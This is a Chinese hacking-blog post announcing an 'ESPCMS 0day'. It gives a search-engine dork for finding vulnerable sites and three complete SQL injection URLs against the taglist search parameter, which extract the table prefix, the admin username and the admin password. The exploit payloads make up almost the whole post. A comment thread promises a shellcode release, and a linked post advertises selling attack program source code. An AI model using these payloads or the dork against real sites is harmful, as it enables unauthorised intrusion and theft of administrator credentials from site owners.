espcms 0day

  • A+
所属分类:lcx

为证明我一直默默在T00LS..

发个小0day!!

百度关键字:inurl:index.php?ac=article&at=read&did=

注入点(爆表前缀):index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆用户名:

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆密码:

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

文章来源于lcx.cc:espcms 0day

相关推荐: 出售电磁风暴 v2.1、电磁风暴 v3.0 程序及源码

留言评论(旧系统): 【匿名者】 @ 2011-12-26 22:18:41 我记得核总以前说要放出那个shellcode增强版。。。。。。 本站回复: 卧槽,你记性真他妈的好,你不说我都忘了还有个这东西了,今天太晚了,明天或后天放出来吧。。。。 【匿名者】 …

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: